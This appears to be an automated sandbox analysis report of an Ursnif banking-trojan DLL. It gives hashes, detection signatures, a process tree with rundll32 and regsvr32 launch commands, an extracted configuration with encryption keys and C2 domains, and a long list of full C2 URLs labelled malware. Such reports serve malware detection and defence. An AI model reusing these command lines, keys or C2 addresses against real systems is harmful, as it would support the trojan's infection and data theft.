Edit tour

Windows Analysis Report
Wartless_v8.8.9.0.dll

Overview

General Information

Sample Name:	Wartless_v8.8.9.0.dll
Analysis ID:	557481
MD5:	3b4e9e88c0dd6e82ecc65e2d219544c6
SHA1:	5d4f4d60773ed452188c8a099b5972edbbb03f90
SHA256:	4d4bedbc795e2dd4fe929b6dc57bfc314165795e25c362959fbabc59c0a60d80
Tags:	exegoziisfbitalypwvodafoneursnifvodafone
Infos:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected Ursnif

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Writes or reads registry keys via WMI

Found API chain indicative of debugger detection

Machine Learning detection for sample

Found evasive API chain (may stop execution after checking system information)

Sigma detected: Suspicious Call by Ordinal

Writes registry values via WMI

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Contains functionality to read the PEB

Found evasive API chain checking for process token information

Registers a DLL

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 7132 cmdline: loaddll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 6304 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 2276 cmdline: rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 784 cmdline: regsvr32.exe /s C:\Users\user\Desktop\Wartless_v8.8.9.0.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

rundll32.exe (PID: 6460 cmdline: rundll32.exe C:\Users\user\Desktop\Wartless_v8.8.9.0.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

iexplore.exe (PID: 6600 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6828 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 4140 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6288 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:82946 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6376 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17418 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6076 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6900 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6000 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:17416 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6508 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:82946 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5348 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:148484 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 3648 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 5228 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6776 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 4844 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:82946 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6852 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:214018 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 344 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 4716 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6512 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:17416 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6464 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:148482 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 1140 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:214018 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "LZsqpoecyAjADjfU7Chg08upMmPh9s52KURwMLeVbExqR0WPzjmiY0sqvuBbVd5UliPpiI1vk//fFbZdaVlJSGEUDRBnUiuB3fsNsZ3RoyiCzywMw4Zr6FxF+hc1b9zRYTQ2cNf3eyWqBzjCdRFagMiiQA+otNVjG6WfRndly80y3zvvE9kF1wgUwiJf27Urr8Ahb9uaOANUBf0VZ8YlfDKqKw0aV0vJ95MA4pfWcKcjRoAs02M+uPJPXQEHtRmRwiN5u8e5omIKfq2TZoNpq6PEAHr8gg2QcaCj9KeqSJEExzjUeb+9ROWN6YZRxQfpZog28cwcG13DaWclsLLFv5K3EZuwv3sh9x7+0P3sHaY=", "c2_domain": ["intermedia.bar", "nnnnnn.bar", "nnnnnn.casa"], "botnet": "7576", "server": "50", "serpent_key": "lMfWhcERJ9HGK8sX", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000005.00000003.349703615.0000000005AC8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000003.343910189.0000000004F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.349753525.0000000005AC8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000006.00000003.348956479.0000000004A98000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000003.344026783.0000000004F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000003.343809632.0000000004F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.503813220.0000000005AC8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000006.00000003.348909317.0000000004A98000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.691343134.00000000037A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.350624974.00000000037A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.350468495.00000000037A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000002.813030577.0000000005AC8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.349673542.0000000005AC8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000003.343983183.0000000004F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000003.343884833.0000000004F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000002.811764188.0000000004F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.349765761.0000000005AC8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000003.343969010.0000000004F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000002.811066205.00000000037A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.350524992.00000000037A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.349774706.0000000005AC8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.350610044.00000000037A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.349722283.0000000005AC8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000006.00000003.505253975.0000000004A98000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.350578118.00000000037A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000006.00000003.348881206.0000000004A98000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000006.00000003.348997305.0000000004A98000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.350596775.00000000037A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000003.343764685.0000000004F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.350398147.00000000037A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000003.343941350.0000000004F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.349738190.0000000005AC8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.349603405.0000000005AC8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.350426132.00000000037A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000006.00000003.349008394.0000000004A98000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000009.00000003.502184053.0000000004F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000006.00000002.811636892.0000000004A98000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000006.00000003.348935901.0000000004A98000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000006.00000003.348822890.0000000004A98000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000006.00000003.348974214.0000000004A98000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 7132	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: regsvr32.exe PID: 784	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 2276	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 6460	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 39 entries

Sigma Overview

System Summary

Sigma detected: Suspicious Call by Ordinal

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6304, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1, ProcessId: 2276

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000006.00000002.810976367.0000000003FF0000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"RSA Public Key": "LZsqpoecyAjADjfU7Chg08upMmPh9s52KURwMLeVbExqR0WPzjmiY0sqvuBbVd5UliPpiI1vk//fFbZdaVlJSGEUDRBnUiuB3fsNsZ3RoyiCzywMw4Zr6FxF+hc1b9zRYTQ2cNf3eyWqBzjCdRFagMiiQA+otNVjG6WfRndly80y3zvvE9kF1wgUwiJf27Urr8Ahb9uaOANUBf0VZ8YlfDKqKw0aV0vJ95MA4pfWcKcjRoAs02M+uPJPXQEHtRmRwiN5u8e5omIKfq2TZoNpq6PEAHr8gg2QcaCj9KeqSJEExzjUeb+9ROWN6YZRxQfpZog28cwcG13DaWclsLLFv5K3EZuwv3sh9x7+0P3sHaY=", "c2_domain": ["intermedia.bar", "nnnnnn.bar", "nnnnnn.casa"], "botnet": "7576", "server": "50", "serpent_key": "lMfWhcERJ9HGK8sX", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Multi AV Scanner detection for submitted file

Source: Wartless_v8.8.9.0.dll	Virustotal: Detection: 19%			Perma Link
Source: Wartless_v8.8.9.0.dll	ReversingLabs: Detection: 13%

Antivirus detection for URL or domain

Source: http://nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGd	Avira URL Cloud: Label: malware
Source: http://nnnnnn.bar/drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk	Avira URL Cloud: Label: malware
Source: http://nnnnnn.bar/.x	Avira URL Cloud: Label: malware
Source: http://www.nnnnnn.casa/drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5tIp9mQUoOfWLynTM/O86glIn9ihyHk/5dZsFtfy/gp_2FLvf0NHL3yVUkVbncwC/We6V8shIxB/_2BT5Ij9nSjAjmHue/61Ynbzrr_2B_/2FOk8Wface5/lcJD0_2FBb9PKs/3pUPEuZF5gHL68StfaFm9/KhGw_2FEloE_2FaF/OCoSTxCMO1I6oVZ/G3ADi.jlk	Avira URL Cloud: Label: malware
Source: http://nnnnnn.casa/drew/clKY_2F9qhXNW5H/_2BsVRKIgOamiE9mQB/_2FVdwPGE/BPO6UbinW_2B8Sjp_2Bo/55Xmf7HJU6cUJy8fy4_/2FKKDKVKISZpEe4syLM93A/M41SvTBw4e_2F/120g53mI/wJJMq93zmJf2crfPUE2j_2B/GM6GQoMDYy/B7CUA1_2BisXnKYTP/uGoP10_2BxHm/imkRUl8or1j/Bw6x7_2BZqhh0x/t_2F833CW3gz1lZ3CY6hP/Kii0oYYxRGsc8HdH/lkRH05yG/dOy.jlk	Avira URL Cloud: Label: malware
Source: http://nnnnnn.bar/drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd	Avira URL Cloud: Label: malware
Source: http://www.nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk	Avira URL Cloud: Label: malware
Source: http://nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bg	Avira URL Cloud: Label: malware
Source: http://nnnnnn.bar	Avira URL Cloud: Label: malware
Source: http://www.nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk	Avira URL Cloud: Label: malware
Source: http://nnnnnn.bar/drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5	Avira URL Cloud: Label: malware
Source: http://nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk	Avira URL Cloud: Label: malware
Source: http://nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGdcDC1Vg/H9xTO58gw9Sr3I5f1oE/852oWfQLj1eL_2Fm_2FKnu/SIHTeaF7Bgvig/PyHxZLDk/ZUvCeNpaiixducNV9xRZlOg/1p1YKkAvPe/T6UiZU08MHesYFSbA/viVchsnOxqJ5/4YMncTmEmBk/k6T3NHIv66mymC/b7Hkig2fkyCUi/2.jlk	Avira URL Cloud: Label: malware
Source: http://www.nnnnnn.casa/drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F	Avira URL Cloud: Label: malware
Source: http://www.nnnnnn.casa/drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk	Avira URL Cloud: Label: malware
Source: http://nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBV	Avira URL Cloud: Label: malware
Source: http://www.nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP	Avira URL Cloud: Label: malware
Source: http://nnnnnn.bar/drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk	Avira URL Cloud: Label: malware
Source: http://www.nnnnnn.casa/drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F_2F05Q3POeadiys1/9wLWHm6Gx/wqhNI29IdUdv3CWDyCfs/2VD0tBt0szHqPTGNMaP/H8c1RSlzmz7xA6aMxeunJS/egWxomuGkwbso/At2D20BI/siieXymS6PJr8im_2FPJeye/Czlrk0gGlx/B4_2FnRkW1_2FVYbi/FmMXH_2Bbn2q/9Abbe5hphXR/x.jlk	Avira URL Cloud: Label: malware
Source: http://nnnnnn.bar/drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH8	Avira URL Cloud: Label: malware
Source: http://nnnnnn.bar/drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk	Avira URL Cloud: Label: malware
Source: http://nnnnnn.bar/drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk	Avira URL Cloud: Label: malware
Source: http://www.nnnnnn.casa/drew/clKY_2F9qhXNW5H/_2BsVRKIgOamiE9mQB/_2FVdwPGE/BPO6UbinW_2B8Sjp_2Bo/55Xmf7HJU6cUJy8fy4_/2FKKDKVKISZpEe4syLM93A/M41SvTBw4e_2F/120g53mI/wJJMq93zmJf2crfPUE2j_2B/GM6GQoMDYy/B7CUA1_2BisXnKYTP/uGoP10_2BxHm/imkRUl8or1j/Bw6x7_2BZqhh0x/t_2F833CW3gz1lZ3CY6hP/Kii0oYYxRGsc8HdH/lkRH05yG/dOy.jlk	Avira URL Cloud: Label: malware
Source: http://nnnnnn.casa/drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F_2F05Q3POeadiys1/9wLWHm6Gx/wqhNI29IdUdv3CWDyCfs/2VD0tBt0szHqPTGNMaP/H8c1RSlzmz7xA6aMxeunJS/egWxomuGkwbso/At2D20BI/siieXymS6PJr8im_2FPJeye/Czlrk0gGlx/B4_2FnRkW1_2FVYbi/FmMXH_2Bbn2q/9Abbe5hphXR/x.jlk	Avira URL Cloud: Label: malware
Source: http://www.nnnnnn.casa/	Avira URL Cloud: Label: malware
Source: http://nnnnnn.bar/drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXe	Avira URL Cloud: Label: malware
Source: http://nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk	Avira URL Cloud: Label: malware
Source: http://nnnnnn.casa/drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5tIp9mQUoOfWLynTM/O86glIn9ihyHk/5dZsFtfy/gp_2FLvf0NHL3yVUkVbncwC/We6V8shIxB/_2BT5Ij9nSjAjmHue/61Ynbzrr_2B_/2FOk8Wface5/lcJD0_2FBb9PKs/3pUPEuZF5gHL68StfaFm9/KhGw_2FEloE_2FaF/OCoSTxCMO1I6oVZ/G3ADi.jlk	Avira URL Cloud: Label: malware
Source: http://nnnnnn.casa/drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5	Avira URL Cloud: Label: malware
Source: http://nnnnnn.bar/drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk	Avira URL Cloud: Label: malware
Source: http://nnnnnn.bar/drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301	Avira URL Cloud: Label: malware
Source: http://nnnnnn.bar/drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk	Avira URL Cloud: Label: malware
Source: http://www.nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGdcDC1Vg/H9xTO58gw9Sr3I5f1oE/852oWfQLj1eL_2Fm_2FKnu/SIHTeaF7Bgvig/PyHxZLDk/ZUvCeNpaiixducNV9xRZlOg/1p1YKkAvPe/T6UiZU08MHesYFSbA/viVchsnOxqJ5/4YMncTmEmBk/k6T3NHIv66mymC/b7Hkig2fkyCUi/2.jlk	Avira URL Cloud: Label: malware
Source: http://nnnnnn.casa/drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk	Avira URL Cloud: Label: malware
Source: http://nnnnnn.casa/drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LA	Avira URL Cloud: Label: malware

